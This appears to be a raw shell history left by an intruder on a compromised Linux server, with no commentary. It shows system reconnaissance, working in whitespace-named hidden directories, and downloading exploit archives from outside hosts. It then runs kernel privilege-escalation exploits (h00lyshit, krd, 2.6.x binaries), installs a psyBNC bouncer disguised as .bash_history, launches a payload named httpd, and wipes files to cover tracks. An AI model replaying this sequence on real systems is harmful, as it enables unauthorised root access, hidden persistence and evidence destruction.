w
exit
w
exit
exit
id
w
./krd
cd ..
rm -rf 2006*
ls
ls -la
cd "    "
ls
w
ps -aux
uname
uname -a
w
cd /var/tmp
ls
ls -la
cd "  "
ls
cd "   "
ls
cd "   "
cd /tm,p
cd /tmp
kls
w
ls
cd climb3r
ls
cd ..
ls
w
ftp 192.208.148.94
wget
curl
cat /etc/issue
uname -a
wget phantom007.go.ro/2006.tar.gz
tar xzvf 2006.tar.gz 
cd 2006
ls
./2.6.13
ls 
./
cd ..
ls
chmod +xr 2006/*
chmod +xr 2006
cd 2006
ls
chmod +xr 2.6.12-rc4
./2.6.12-rc4
./2.6.12-rc4
./2.6.13
./2.6.13-17.4
./h00lyshit
./krd
bin/bash
/bin/bash
w
ls
ps -aux
cd /tmp
ls
ls -la
cd /var/tmp
ls
ls -la
cp -f psyBNC-2.3.2-7.tar.gz /tmp
cd /tmp
ls
ls -a
ls -al
tar xzvf psyBNC-2.3.2-7.tar.gz
rm -rf psyBNC-2.3.2-7.tar.gz
mv psybnc .bash_history
cd .bash_history/
ls
make 
make all
cd ..
ls
rm -rf * .*
wget http://www.psybnc.net/psyBNC2.3.1.tar.gz
tar xzvf psyBNC2.3.1.tar.gz
rm -rf psyBNC2.3.1.tar.gz
mv psybnc .bash_history
cd .bash_history/
ls
make all
make
ls
cd tools/
ls
pico convconf.c
nano convconf.c
ls
cd ..
mak
make
ks
ls
cd ..
ls
rm -rf .* *
ls -la
w
wget geocities.com/cocosel_01/linux-archives/psybnc.tgz
wget geocities.com/cocosel_01/psybnc-emech-eggdrop/psybnc.tgz
tar xzvf psybnc.tgz
rm -rf psybnc.tgz
cd .bc
ls
./httpd
cd ..
ls
rm -rf .bc
ls
w
